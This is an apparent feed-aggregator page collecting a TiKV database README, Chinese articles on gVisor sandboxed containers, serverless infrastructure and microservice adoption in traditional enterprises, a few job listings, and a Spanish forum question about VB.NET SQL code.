Distributed transactional key-value database, originally created to complement TiDB 

Build Status Coverage Status GitHub release
TiKV ("Ti" stands for Titanium) is a distributed transactional key-value database, originally created to complement TiDB, a distributed HTAP database compatible with the MySQL protocol. TiKV is built in Rust and powered by Raft, and was inspired by the design of Google Spanner and HBase, but without dependency on any specific distributed file system.
With the implementation of the Raft consensus algorithm in Rust and consensus state stored in RocksDB, TiKV guarantees data consistency. Placement Driver (PD), which is introduced to implement auto-sharding, enables automatic data migration. The transaction model is similar to Google's Percolator with some performance improvements. TiKV also provides snapshot isolation (SI), snapshot isolation with lock (SQL: SELECT ... FOR UPDATE), and externally consistent reads and writes in distributed transactions.
TiKV is hosted by the Cloud Native Computing Foundation (CNCF). If you are a company that wants to help shape the evolution of cloud native technologies, consider joining the CNCF. For details about who's involved and how TiKV plays a role, read the CNCF announcement.
TiKV has the following key features:
  • Geo-Replication
    TiKV uses Raft and the Placement Driver to support Geo-Replication.
  • Horizontal scalability
    With PD and carefully designed Raft groups, TiKV excels in horizontal scalability and can easily scale to 100+ TBs of data.
  • Consistent distributed transactions
    Similar to Google's Spanner, TiKV supports externally-consistent distributed transactions.
  • Coprocessor support
    Similar to Hbase, TiKV implements a coprocessor framework to support distributed computing.
  • Cooperates with TiDB
    Thanks to the internal optimization, TiKV and TiDB can work together to be a compelling database solution with high horizontal scalability, externally-consistent transactions, support for RDBMS, and NoSQL design patterns.

TiKV Adopters

You can view the list of TiKV Adopters.

TiKV Roadmap

You can see the TiKV Roadmap.
from https://github.com/tikv/tikv

          Google 发布 gVisor - 容器沙箱运行时(sandboxed container runtime)      Cache   Translate Page      

这是来自官方博客 Open-sourcing gVisor, a sandboxed container runtime 的摘要及翻译

自 Docker 的普及开始,我们开发、打包和部署应用的方式发生了根本性的变化,但是由于容器的隔离技术所限,并不是所有的人都推崇使用容器技术,因为其共享内核机制,系统还存在很大的攻击面,这就会存在恶意应用程序侵入系统的威胁。
为了运行那些不可信以及存在潜在威胁的容器,人们开始更加重视沙箱容器:一种能在宿主机和应用程序之间提供更安全的隔离机制。
Google 发布的 gVisor ,就是这样一种新型的沙箱容器技术,它能为容器提供更安全的隔离,同时比虚拟机(VM)更轻量。 而且,gVisor 还能和 Docker 以及 Kubernetes 集成在一起,使得在生产环境中运行沙箱容器更简单。

传统的 Linux 容器并非沙箱

传统 Linux 容器中运行的应用程序与常规(非容器化)应用程序以相同的方式访问系统资源:直接对主机内核进行系统调用。内核以特权模式运行,允许它与必要的硬件交互并将结果返回给应用程序。
在传统的容器技术中,内核会对应用程序需要访问的资源施加一些限制。这些限制通过使用 Linux 的 cgroups 和命名空间技术来实现,然而并非所有的资源都可以通过这些机制来进行控制。此外,即使使用这些限制,内核仍然面向恶意程序暴露出过多的攻击面。
像 seccomp 这样的技术可以在应用程序和主机内核之间提供更好的隔离,但是它们要求用户创建预定义的系统调用白名单。在实际中,很难事先罗列出应用程序所需要的所有系统调用。如果你需要调用的系统调用存在漏洞,那么这类过滤器也很难发挥作用。

已有基于 VM 的容器技术

提高容器隔离性的一种方法是将容器运行在其自己的虚拟机(VM)之内。也就是为每个容器提供自己专用的“机器”,包括内核和虚拟化设备,并与主机完全分离。即使 guest 虚拟机存在漏洞,管理程序( hypervisor )仍会隔离主机以及主机上运行的其他应用程序/容器。
在不同的 VM 中运行容器提供了很好的隔离性、兼容性和性能,但也可能需要更大的资源占用。
Kata containers 是一个开源项目,它使用精简的虚拟机来尽量减少资源的占用,并最大限度地提高隔离容器的性能。与 gVisor 一样,Kata 也包含与 Docker 和 Kubernetes 兼容的 OCI (Open Container Initiative )运行时。

基于 gVisor 的沙箱容器( Sandboxed containers )

gVisor 比 VM 更轻量,同时具备相同的隔离级别。 gVisor 的核心是一个以普通非特权进程方式运行的内核,它支持大多数 Linux 系统调用。这个内核是用 Go 编写的,选择 Go 语言是由于其较小的内存占用以及类型安全等特性。和虚拟机一样,在 gVisor 沙箱中运行的应用程序也可以拥有独立于主机和其他沙箱、自己独自的内核和一组虚拟设备。
gVisor 通过拦截应用程序的系统调用,并充当 guest 内核,提供了非常强的隔离性,而所有的这些都运行在用户空间。和虚拟机在创建时需要一定的资源不同,gVisor 可以像普通 Linux 进程一样,随时调整自己的资源使用。可以将 gVisor 看做是一个完全虚拟化的操作系统,但是与完整的虚拟机相比,它具有灵活的资源占用和更低的固定成本。
但是,这种灵活性的代价是单个系统调用的消耗、应用程序的兼容性(和系统调用相关)以及其他问题。
“安全工作负载(workloads)是业界的首要任务,我们很高兴看到像 gVisor 这样的创新,并期待在规范方面进行合作,并对相关技术组件进行改进,从而为生态系统带来更大的安全性。”
  • Samuel Ortiz,Kata 技术指导委员会成员,英特尔公司首席工程师
“Hyper 非常高兴看到 gVisor 这样全新的提高容器隔离性的方法。行业需要一个强大的安全容器技术生态系统,我们期待通过与 gVisor 的合作让安全容器成为主流。“
  • Xu Wang,Kata 技术指导委员会成员,Hyper.sh CTO

和 Docker、Kubernetes 集成

gVisor 运行时可以通过 runsc(run Sandboxed Container) 和 Docker 以及 Kubernetes 进行无缝集成。
runsc 运行时与 Docker 的默认容器运行时 runc 可以互换。runsc 的安装很简单,一旦安装完成,只需要在运行 docker 的时候增加一个参数就可以使用沙箱容器:
$ docker run --runtime=runsc hello-world
$ docker run --runtime=runsc -p 3306:3306 mysql
在 Kubernetes 中,大多数资源隔离都以 Pod 为单位,因此 Pod 也自然成为了 gVisor 沙箱的边界(boundary)。Kubernetes 社区目前正在致力于实现沙箱 Pod API,但是今天 gVisor 沙箱已经可以在实验版中(experimental support)可用。
runsc 运行时可以通过 cri-o 或 cri-containerd 等项目来在 Kubernetes 群集中使用沙箱技术,这些项目会将 Kubelet 中的消息转换为 OCI 运行时命令。
gVisor 实现了大部分 Linux 系统 API ( 200 个系统调用,并且还在增加中),但并不是所有的系统调用。目前有一些系统调用和参数还没有支持,以及 /proc 和 /sys 文件系统的一些部分内容。因此,并不是说所有的应用程序都可以在 gVisor 中正常运行,但大部分应用程序应该都可以正常运行,包括 Node.js、Java 8、MySQL、Jenkins、Apache、Redis 和 MongoDB 等等。
gVisor 已经开源,可以在 https://github.com/google/gvisor 查看到其内容,相信这里将会是大家了解 gVisor 最好的开始.

          世界是 container 的,也是 microservice 的,但最终还是 serverless 的.      Cache   Translate Page      

副标题是这样的: “Hyper,Fargate,以及 Serverless infrastructure”。

世界上有两种基础设施,一种是拿来主义,另一种是自主可控。
原谅我也蹭个已经被浇灭的、没怎么火起来的热点。不过我们喜欢的是拿来主义,够用就行,不想也不需要过多的控制,也不想惹过多的麻烦,也就是 fully managed。
之所以想到写这篇文章,源于前几天看到的这篇来自微软 Azure 的博客内容: The Future of Kubernetes Is Serverless ,然后又顺手温习了一遍 AWS CTO 所撰写的 Changing the calculus of containers in the cloud 这篇文章。这两篇文章你觉得有可能有广告的嫌疑,都是在推销自家的共有云服务,但是仔细品味每一句话,我却觉得几乎没有几句废话,都很说到点子上,你可以点击进去看下原文。
有个前提需要说明的是,这里的 Serverless 指的是 Serverless infrastructure,而不是我们常听到的 AWS Lambda,Microsoft Azure Functions 或 Google Cloud Functions 等函数(功能)即服务(FaaS)技术,为了便于区分,我们将这些 FaaS 称为无服务器计算,和我们本文要介绍的无服务器基础设施还是不一样的。

IaaS:变革的开始

说到基础设施,首先来介绍下最先出现的 IaaS,即基础设施即服务。IaaS 免除了大部分硬件的 provision 工作,没人再关心机架、电源和服务器问题,使得运维工作更快捷,更轻松,感觉解放了很多人,让大家走上了富裕之路。
当然这一代的云计算服务,可不只是可以几分钟启动一台虚拟机那么简单。
除了 VM 之外, IaaS 厂商还提供了很多其他基础设施和中间件服务,这些组件被称为 building block ,比如网络和防火墙、数据库、缓存等老三样,最近还出现了非常多非常多的业务场景服务,大数据、机器学习和算法,以及IoT等,看起来就像个百货商店,使用云计算就像购物,架构设计就是购物清单,架构里的组件都可以在商店里买到。
基础设施则使用 IaaS 服务商所提供的各种服务,编写应用程序可以更专注于业务。这能带来很多好处:
  • 将精力集中投入到核心业务
  • 加快上线速度
  • 提高可用性
  • 快速扩缩容
  • 不必关心中间件的底层基础设施
  • 免去繁杂的安装、配置、备份和安全管理等运维工作
在 AWS 成为业界标准之后,各大软件公司,不管是新兴的还是老牌的,都开始着手打造自己的云,国外有微软、谷歌、IBM等,国内的 BAT 也都有自己的云,以及京东和美团这样的电商类公司也有自己的云产品,独立的厂商类似 UCloud 和青云等公司也发展的不错,甚至有开饭馆的也要出来凑热闹。而开源软件 OpenStack 和基于 OS 的创业公司和产品也层出不穷。
全民皆云。

容器:云计算的深入人心

之后在 2013 年,容器技术开始面向大众普及了。在 LXC 之前,容器对普通开发人员甚至 IT 业者来说几乎不是同一个维度的术语,那是些专业人员才能掌控的晦涩的术语和繁杂的命令集,大部分人都没有用过容器技术;但是随着 Docker 的出现,容器技术的门槛降低,也在软件行业变得普及。随着几年的发展,基本可以说容器技术已经非常成熟,已成为了开发的标配。
随着容器技术的成熟和普及,应用程序架构也出现了新的变化,可以说软件和基础设施的进化相辅相成。人们越来越多的认识到对技术栈的分层和解耦更加重要,不同层之间的技术和责任、所有权等界限清晰明了,这也和软件设计中的模块松耦合原则很相像。
在有了责权明晰的分层结构之后,每个人可以更容易集中在自己所关注的重点上。开发人员更关注应用程序本身了,在 Docker 火了的同时,也出现了 app-centric 的概念。甚至 CoreOS 还将自己对抗 OCI/runc 的标准称为 appc 。当然现在的 Docker 也不是原来的 Docker ,也是一个组件化的东西,很多组件,尤其是 runtime ,都可以替换为其他运行时。
和以应用程序为重心相对应的是传统的以基础设施为中心,即先有基础设施,围绕基础设施做架构设计和开发、部署,受基础设施的限制较多。而随着 IaaS 等服务的兴起,基础设施越来越简单,越来越多容易入手,而且还提供了编程化的接口,开发人员也可以非常方便的对基础设施进行管理,可以说云计算的出现也使得开发人员抢了一部分运维人员的饭碗(遗憾的是这种趋势太 high 了停不下来。。。)。
当然,现在以应用为中心这一概念也已经深入人心。特别是进化到极致的 FaaS ,自己只需要写几行代码,其他平台全给搞定了。

编排:兵家必争之地

容器解决了代码的可移植性的问题,也使得在云计算中出现新的基础设施应用模式成为可能。使用一个一致的、不可变的部署制品,比如镜像,可以让我们从复杂的服务器部署中解脱出来,也可以非常方便的部署到不同的运行环境中(可移植性)。
但是容器的出现也增加了新的工作内容,要想使用容器运行我们的代码,就需要一套容器管理系统,在我们编写完代码,打包到容器之后,需要选择合适的运行环境,设置好正确的扩容配置,相关的网络连接,安全策略和访问控制,以及监控、日志和分布式追踪系统。
之所以出现编排系统,就是因为一台机器已经不够用了,我们要准备很多机器,在上面跑容器,而且我不关心容器跑在哪台机器上,这个交给调度系统就行了。可以说,从一定层面上,编排系统逐渐淡化了主机这一概念,我们面对的是一个资源池,是一组机器,有多少个 CPU 和多少的内存等计算资源可用。
rkt vs Docker 的战争从开始其实就可以预料到结局,但在编排系统/集群管理上,这场“战争”则有着更多的不确定性。
Mesos(DC/OS)出来的最早,还有 Twitter 等公司做案例,也是早期容器调度系统的标配;Swarm 借助其根正苗红以及简单性、和 Docker 的亲和性,也要争一分地盘;不过现在看来赢家应该是 K8s,K8s 有 Google 做靠山,有 Google 多年调度的经验,加上 RedHat/CoreOS 这些反 Docker 公司的站队,社区又做得红红火火,总之是赢了。
据说今年在哥本哈根举办的 Kubecon 有 4300 人参加。不过当初 Dockercon 也是这声势,而现在影响力已经没那么大了,有种昨日黄花、人老色衰的感觉,不知道几年之后的 Kubernetes 将来会如何,是否会出现新的产品或服务来撼动 Kubernetes 现在的地位?虽然不一定,但是我们期待啊。

Serverless infrastructure:进化的结果

但是呢,淡化主机的存在性也只是淡化而已,并没有完全消除主机的概念,只是我们直接面向主机的机会降低了,不再直接面向主机进行部署,也不会为某些部门分配独占的主机等。主机出了问题还得重启,资源不够了还得添加新的主机,管理工作并没有完全消失。
但是管理一套集群带来了很大的复杂性,这也和使用云计算的初衷相反,更称不上云原生。
从用户的角度再次审视一下,可以发现一个长时间被我们忽略的问题:为什么只是想运行容器,非得先买一台 VM 装好 Docker,或者自己搭建一套 Kubernetes 集群,或者使用类似 EKS 这样的服务,乐此不疲的进行各种配置和调试,不仅花费固定的资产费,还增加了很多并没有任何价值的运维管理工作。
既然我们嫌弃手动在多台主机中部署容器过于麻烦,将其交给集群管理和调度系统去做,那么维护调度系统同样繁杂的工作,是不是也可以交给别人来做,外包出去呢?
按照精益思想,这些和核心业务目标无关,不能带来任何用户价值的过程,都属于浪费行为,都需要提出。
这时候,出现了 Serverless infrastructure 服务,最早的比如国内的 hyper.sh (2016.8 GA),以及去年发布的 AWS 的 Fargate(2017.12),微软的 ACI(Azure Container Instance,2017.7) 等。
以 hyper.sh 为例,使用起来和 Docker 非常类似,可以将本地的 Docker 体验原封不动的搬到云端:
$ brew install hyper 
$ hyper pull mysql
$ hyper run mysql
MySQL is running...
$ hyper run --link mysql wordpress
WordPress is running...
$ hyper fip attach 22.33.44.55 wordpress
22.33.44.55
$ open 22.33.44.55
大部分命令从 docker 换成 hyper 就可以了,体验如同使用 Docker 一模一样,第一次看到这样的应用给人的新奇感,并不亚于当初的 Docker 。
使用 Serverless infrastructure,我们可以再不必为如下事情烦恼:
  • 不必再去费心选择 VM 实例的类型,需要多少 CPU 和内存
  • 不必再担心使用什么版本的 Docker 和集群管理软件
  • 不必担心 VM 内中间件的安全漏洞
  • 不必担心集群资源利用率太低
  • 从为资源池付费变为为运行中的容器付费
  • 完全不可变基础设施
  • 不用因为 ps 时看到各种无聊的 agent 而心理膈应
我们需要做的就是安心写自己的业务应用,构建自己的镜像,选择合适的容器大小,付钱给 cloud 厂商,让他们把系统做好,股票涨高高。

Fargate(此处也可以换做 ACI ):大厂表态

尽管 AWS 不像 GCP 那样“热衷”于容器,但是 AWS 也还是早就提供了 ECS(Elastic Container Service)服务。
去年发布的 AWS Fargate 则是个无服务器的容器服务,Fargate 是为了实现 AWS 的容器服务,比如 ECS(Elastic Container Service) 和 EKS(Elastic Kubernetes Service) 等,将容器运行所需要的基础设施进行抽象化的技术,并且现在 ECS 已经可以直接使用 Fargate。
和提供虚拟机的 EC2 不同,Fargate 提供的是容器运行实例,用户以容器作为基本的运算单位,而不必担心底层主机实例的管理,用户只需建立容器镜像,指定所需要的 CPU 和内存大小,设置相应的网络和IAM(身分管理)策略即可。
对于前面我们的疑问,AWS 的答案是基础设施的坑我们来填,你们只需要专心写好自己的应用程序就行了,你不必担心启动多少资源,我们来帮你进行容量管理,你只需要为你的使用付费就行了。
可以说 Fargate 和 Lambda 等产品都诞生于此哲学之下。
终于可以专心编写自己最擅长的 CRUD 了,happy,happy。

Serverless infrastructure vs Serverless compute

再多说几句,主要是为了帮助大家辨别两种不同的无服务器架构:无服务器计算和无服务器基础设施。
说实话一下子从 EC2 迁移到 Lambda ,这步子确实有点大。
Lambda 等 FaaS 产品虽然更加简单,但是存在有如下很多缺点:
  • 使用场景:Lambda 更适合用户操作或事件驱动,不适合做守护服务、批处理等业务
  • 灵活性:固定的内核、AMI等,无法定制
  • 资源限制:文件系统、内存、进程线程数、请求 body 大小以及执行时间等很多限制
  • 编程语言限制
  • 很难做服务治理
  • 不方便调试和测试
Lambda 和容器相比最大的优势就是运维工作更少,基本没有,而且计费更精确,不需要为浪费的计算资源买单,而且 Lambda 响应更快,扩容效率会高一些。
可以认为 Fargate 等容器实例,就是结合了 EC2 实例和 Lambda 优点的产品,既像 Lambda 一样轻量,更关注核心的应用程序,还能像 EC2 一样带来很大的灵活性和可控性。
云原生会给用户更多的控制,但是需要用户更少的投入和负担。
Serverless infrastructure 可以让容器更加 cloud native。

fully managed:大势所趋

所谓的 fully managed,可以理解为用户花费很少的成本,就可以获得想要的产品、服务并可以进行相应的控制。
这两天,阿里云发布了 Serverless Kubernetes ,Serverless Kubernetes 与原生的 Kubernetes 完全兼容,可以采用标准的 API、CLI 来部署和管理应用,还可以继续使用各种传统资产,并且还能获得企业级的高可用和安全性保障。难道以后我们连 Kubernetes 也不用自己装了,大部分人只需要掌握 kubectl 命令就好了。
IaaS 的出现,让我们丢弃了各种 provision 工具,同时,各种 configuration management 工具如雨后春笋般的出现和普及;容器的出现,又让我们扔掉了刚买还没看几页的各种 Chef/Puppet 入门/圣经,匆忙学起 Kubernetes;有了 Serverless infrastructure,也差不多可以和各种编排工具说拜拜了。
不管你们是在单体转微服务,还是在传统上云、转容器,估计大家都会喜欢上 fully managed 的服务,人人都做 Ops,很多运维工作都可以共同分担。当然,也会有一部分运维工程师掩面而逃.

          Technical Architect - Data Solutions - CDW - Milwaukee, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Milwaukee, WI jobs
          Technical Architect - Data Solutions - CDW - Madison, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Madison, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page      
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sun, 28 Oct 2018 21:34:20 GMT - View all Bellevue, WA jobs
          Problema en codigo sql para visual basic      Cache   Translate Page      

Problema en codigo sql para visual basic

hola amigos alguien me puede decir en donde tengo el error porque la palabra FROM me aparece una raya roja y no me deja ejecutar el codigo .programo en visual studio!! y estoy haciendo un programa en visual basic.net
el codigo es el siguiente:

Imports MySql.Data.MySqlClient Public Class frm_inicio_sesion Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load End Sub Private Sub btn_ingresar_Click(sender...

Publicado el 05 de Noviembre del 2018 por JUAN MIGUEL

          致传统企业朋友:不够痛就别微服务,有坑      Cache   Translate Page      

一、微服务落地是一个复杂问题,牵扯到IT架构,应用架构,组织架构多个方面

在多家传统行业的企业走访和落地了微服务之后,发现落地微服务是一个非常复杂的问题,甚至都不完全是技术问题。

当时想微服务既然是改造应用,做微服务治理,类似注册,发现,熔断,限流,降级等,当然应该从应用开发组切入,一般一开始聊的会比较开心,从单体架构,到SOA,再到微服务架构,从Dubbo聊到SpringCloud,但是必然会涉及到微服务的发布和运维问题,涉及到DevOps和容器层,这些都不在开发组的控制范围内,一旦拉进运维组,对于容器的接受程度就成了一个问题,和传统物理机,虚拟机的差别,会带来什么风险等等等等,尤其是容器绝对不是轻量级的虚拟化这件事情,就不是一时半会儿能说的明白的。更何况就算说明白了,还有线上应用容器,一旦出了事情,谁背锅的问题,容器往往会导致应用层和基础设施层界限模糊,这使得背锅双方都会犹豫不决。

image

有的企业的微服务化是运维部门发起的,运维部门已经意识到了各种各样不统一的应用给运维带来的苦,也乐意接受容器的运维模式,这就涉及到容器直接的服务发现是否应该运维在容器层搞定,还是应用应该自己搞定的问题,还涉及Dockerfile到底是开发写还是运维写的问题。一旦容器化的过程中,开发不配合,运维单方面去做这个事情,是徒增烦恼却收益有限的。

下图是微服务实施的过程中涉及到的层次,具体的描述参考文章云架构师进阶攻略

image

在一些相对先进的企业,会在运维组和开发组之间,有个中间件组,或者叫做架构组,来负责推动微服务化改造的事情,架构组就既需要负责劝说业务开发实施微服务化,也要劝说运维组实施容器化,如果架构组的权威性不足,推动往往也会比较困难。

所以微服务,容器,DevOps的推动,不单单是一个技术问题,更是一个组织问题,在推动微服务的过程中,更加能够感觉到康威定律的作用,需要更高层次技术总监或者CIO的介入,方能够推动微服务的落地。

然而到了CIO层,在很多企业又体会不到技术层面的痛点了,而更加关注业务的层面了,只要业务能赚钱,架构的痛,中间件的痛,运维的痛,高层不是非常能够感知,也就体会不到微服务,容器化的技术优势了,而微服务和容器化对于业务的优势,很多厂家在说,能够说到表面,说不到心里。

因而微服务和容器化的改造,更加容易发生在一个扁平化的组织里面,由一个能够体会到基层技术细节的痛的CIO,高瞻远瞩的推动这件事情。这也是为什么微服务的落地一般率先落地在互联网公司,因为互联网公司的组织架构实在太平台,哪怕是高层,也离一线非常的近,了解一线的痛。

然而在传统行业就没有那么幸运了,层级往往会比较多,这个时候就需要技术上的痛足够痛,能够痛到影响业务,能够痛到影响收入,能够痛到被竞争对手甩在后面,才能上达天听。

我们接下来就梳理一下,在这个过程中的那些痛。

二、阶段一:单体架构群,多个开发组,统一运维组

image

2.1. 阶段一的组织状态

组织状态相对简单。

统一的运维组,管理物理机,物理网络,Vmware虚拟化等资源,同时部署上线由运维部负责。

开发组每个业务都是独立的,负责写代码,不同的业务沟通不多,开发除了做自己的系统外,还需要维护外包公司开发的系统,由于不同的外包公司技术选型差异较大,因而处于烟囱式的架构状态。

传统烟囱式架构如下图所示

image

2.2. 阶段一的运维模式

在传统架构下,基础设施层往往采取物理机或者虚拟化进行部署,为了不同的应用之间方便相互访问,多采取桥接扁平二层机房网络,也即所有的机器的IP地址都是可以相互访问的,不想互相访问的,多采用防火墙进行隔离。

无论是使用物理机,还是虚拟化,配置是相对复杂的,不是做过多年运维的人员,难以独立的创建一台机器,而且网络规划也需要非常小心,分配给不同业务部门的机器,网段不能冲突。所有这一切,都需要运维部门统一进行管理,一般的IT人员或者开发人员既没有专业性,也不可能给他们权限进行操作,要申请机器怎么办,走个工单,审批一下,过一段时间,机器就能创建出来。

2.3. 阶段一的应用架构

传统架构数据库层,由于外包公司独立开发,或者不同开发部门独立开发,不同业务使用不同的数据库,有用Oracle的,有用SQL Server的,有用Mysql的,有用MongoDB的,各不相同。

传统架构的中间件层,每个团队独立选型中间件:

传统架构的服务层,系统或者由外包公司开发,或者由独立团队开发。

传统架构前端,各自开发各自的前端。

2.4. 阶段一有什么问题吗?

其实阶段一没有任何问题,我们甚至能找出一万个理由说明这种模式的好处。

运维部和开放部是天然分开的,谁也不想管对方,两边的老大也是评级的,本相安无事。

机房当然只能运维人员能碰,这里面有安全的问题,专业性的问题,线上系统严肃的问题。如果交给没有那么专业的开发去部署环境,一旦系统由漏洞,谁能担责任,一旦线上系统挂了,又是谁的责任,这个问题问出来,能够让任何争论鸦雀无声。

数据库无论使用Oracle, DB2,还是SQL Server都没有问题,只要公司有足够的预算,而且性能也的确杠杠的,里面存储了大量存储过程,会使得应用开发简单很多,而且有专业的乙方帮忙运维,数据库如此关键,如果替换称为Mysql,一旦抗不出挂了,或者开源的没人维护,线上出了事情,谁来负责?

中间件,服务层,前端,全部由外包商或者乙方搞定,端到端维护,要改什么招手即来,而且每个系统都是完整的一套,部署方便,运维方便。

其实没有任何问题,这个时候上容器或者上微服务,的确自找麻烦。

2.5. 什么情况下才会觉得阶段一有问题?

当然最初的痛点应该在业务层面,当用户的需求开始变的多种多样,业务方时不时的就要上一个新功能,做一个新系统的时候,你会发现外包公司不是能完全搞定所有的事情,他们是瀑布模型的开发,而且开发出来的系统很难变更,至少很难快速变更。

于是你开始想自己招聘一些开发,开发自己能够把控的系统,至少能够将外包公司开发的系统接管过来,这个时候,应对业务部门的需求,就会灵活的多。

但是自己开发和维护就带来了新的问题,多种多样的数据库,根本不可能招聘到如此多样的DBA,人都非常的贵,而且随着系统的增多,这些数据库的lisense也非常的贵。

多种多样的中间件,每个团队独立选型中间件,没有统一的维护,没有统一的知识积累,无法统一保障SLA。一旦使用的消息队列,缓存,框架出了问题,整个团队没有人能够搞定这个事情,因为大家都忙于业务开发,没人有时间深入的去研究这些中间件的背后原理,常见的问题,如何调优等等。

前端框架也有相同的问题,技术栈不一致,界面风格不一致,根本无法自动做UI测试。

当维护了多套系统之后,你会发现,这些系统各个层次都有很多的共同点,很多能力是可以复用的,很多数据是可以打通的。同样一套逻辑,这里也有,那里也有,同样类型的数据,这里一份,那里一份,但是信息是隔离的,数据模型不统一,根本无法打通。

当出现这些问题的时候,才是您考虑进入第二个阶段。

三、阶段二:组织服务化,架构SOA化,基础设施云化

image

3.1. 阶段二的组织形态

怎么解决上面的问题呢?

根据康威定理,组织方面就需要有一定的调整,整个公司还是分运维组和开发组。

由于痛点是从业务层面发生的,开始调整的应该是开发组。

应该建立独立的前端组,统一前端框架,界面一致,所有人掌握统一的前端开发能力,积累前端代码,在有新的需求的时候,能够快速的进行开发。

建立中间件组,或者架构师组,这部分人不用贴近业务开发,每天的任务就是研究如何使用这些中间件,如何调优,遇到问题如何Debug,形成知识积累。如果有统一的一帮人专注中间件,就可以根据自身的情况,选择有限几个中间件集中研究,限定业务组只使用这些中间件,可保证选型的一致性,如果中间件被这个组统一维护,也可以提供可靠的SLA给业务方。

将业务开发组分出一部分来,建立中台组,将可以复用的能力和代码,交由这几个组开发出服务来,给业务组使用,这样数据模型会统一,业务开发的时候,首先先看看有哪些现成的服务可以使用,不用全部从零开发,也会提高开发效率。

3.2. 阶段二的应用架构

要建立中台,变成服务为其他业务使用,就需要使用SOA架构,将可以复用的组件服务化,注册到服务的注册中心。

对于有钱的企业,可能会采购商用的ESB总线,也有使用Dubbo自己封装称为服务注册中心。

接下来就是要考虑,哪些应该拆出来? 最后考虑的是如何拆出来?

这两个题目的答案,不同的企业不同,其实分为两个阶段,第一个阶段是尝试阶段,也即整个公司对于服务化拆分没有任何经验,当然不敢拿核心业务上手,往往选取一个边角的业务,先拆拆看,这个时候拆本身是重要的,其实是为了拆而拆,拆的比较理想化,符合领域驱动设计的最好,如何拆呢?当然是弄一个两个月,核心员工大家闭门开发,进行拆分和组合,来积累经验。很多企业目前处于这个阶段。

但是其实这个阶段的拆法也只能用来积累经验,因为咱们最初要拆分,是为了快速响应业务请求,而这个边角的模块,往往不是最痛的核心业务。本来业务就边角,拆不拆收益不大,而且也没办法很好的做能力复用。复用当然都想复用核心能力。

所以其实最重要的是第二个阶段,业务真正的服务化的阶段。当然要拿业务需求最多的核心业务逻辑下手,才能起到快速响应业务请求,复用能力的作用。

例如考拉最初也是一个使用Oracle,对外只有一个online业务的单体应用,而真正的拆分,就是围绕核心的下单业务逻辑进行的。

image

那核心业务逻辑中,哪些应该拆出来呢?很多企业会问我们,其实企业自己的开发最清楚。

这个时候经常犯的错误是,先将核心业务逻辑从单体应用中拆分出来。例如将下单逻辑形成下单服务,从online服务中拆分出来。

当然不应该这样,例如两军打仗,当炊事班的烟熏着战士了,是将中军大营搬出去,还是讲炊事班搬出去呢?当然是炊事班了。

另外一点是,能够形成复用的组件,往往不是核心业务逻辑。这个很好理解,两个不同的业务,当然是核心业务逻辑不同(要不就成一种业务了),核心业务逻辑往往是组合逻辑,虽然复杂,但是往往不具备复用性,就算是下单,不同的电商也是不一样的,这家推出了什么什么豆,那家推出了什么什么券,另一家有个什么什么活动,都是核心业务逻辑的不同,会经常变。能够复用的,往往是用户中心,支付中心,仓储中心,库存中心等等核心业务的周边逻辑。

所以拆分,应该将这些核心业务的周边逻辑,从核心业务里面拆出来,最终Online就剩下下单的核心路径了,就可以改成下单服务了。当业务方突然有了需求推出一个抢购活动,就可以复用刚才的周边逻辑了。抢购就成了另一个应用的核心逻辑,其实核心逻辑是传真引线的,周边逻辑是保存数据,提供原子化接口的。

那哪些周边逻辑应该先拆出来呢?问自己的开发吧,那些战战兢兢,自己修改后生怕把核心逻辑搞挂了的组,是自己有动力从核心逻辑中拆分出来的,这个不需要技术总监和架构师去督促,他们有自己的原有动力,是一个很自然的过程。

image

这里的原有动力,一个是开发独立,一个是上线独立,就像考拉的online系统里面,仓库组就想自己独立出去,因为他们要对接各种各样的仓储系统,全球这么多的仓库,系统都很传统,接口不一样,没新对接一个,开发的时候,都担心把下单核心逻辑搞挂了,造成线上事故,其实仓储系统可以定义自己的重试和容灾机制,没有下单那么严重。物流组也想独立出去,因为对接的物流公司太多了,也要经常上线,也不想把下单搞挂。

您也可以梳理一下贵公司的业务逻辑,也会有自行愿意拆分的业务,形成中台服务。

当周边的逻辑拆分之后,一些核心的逻辑,互相怕影响,也可以拆分出去,例如下单和支付,支付对接多个支付方的时候,也不想影响下单,也可以独立出去。

然后我们再看,如何拆分的问题?

关于拆分的前提,时机,方法,规范等,参考文章微服务化之服务拆分与服务发现

image

首先要做的,就是原有工程代码的标准化,我们常称为“任何人接手任何一个模块都能看到熟悉的面孔”

例如打开一个java工程,应该有以下的package:

另外是测试文件夹,每个类都应该有单元测试,要审核单元测试覆盖率,模块内部应该通过Mock的方法实现集成测试。

接下来是配置文件夹,配置profile,配置分为几类:

当一个工程的结构非常标准化之后,接下来在原有服务中,先独立功能模块 ,规范输入输出,形成服务内部的分离。在分离出新的进程之前,先分离出新的jar,只要能够分离出新的jar,基本也就实现了松耦合。

接下来,应该新建工程,新启动一个进程,尽早的注册到注册中心,开始提供服务,这个时候,新的工程中的代码逻辑可以先没有,只是转调用原来的进程接口。

为什么要越早独立越好呢?哪怕还没实现逻辑先独立呢?因为服务拆分的过程是渐进的,伴随着新功能的开发,新需求的引入,这个时候,对于原来的接口,也会有新的需求进行修改,如果你想把业务逻辑独立出来,独立了一半,新需求来了,改旧的,改新的都不合适,新的还没独立提供服务,旧的如果改了,会造成从旧工程迁移到新工程,边迁移边改变,合并更加困难。如果尽早独立,所有的新需求都进入新的工程,所有调用方更新的时候,都改为调用新的进程,对于老进程的调用会越来越少,最终新进程将老进程全部代理。

接下来就可以将老工程中的逻辑逐渐迁移到新工程,由于代码迁移不能保证逻辑的完全正确,因而需要持续集成,灰度发布,微服务框架能够在新老接口之间切换。

最终当新工程稳定运行,并且在调用监控中,已经没有对于老工程的调用的时候,就可以将老工程下线了。

3.3. 阶段二的运维模式

经过业务层的的服务化,也对运维组造成了压力。

应用逐渐拆分,服务数量增多。

在服务拆分的最佳实践中,有一条就是,拆分过程需要进行持续集成,保证功能一致。

image

而持续集成的流程,往往需要频繁的部署测试环境。

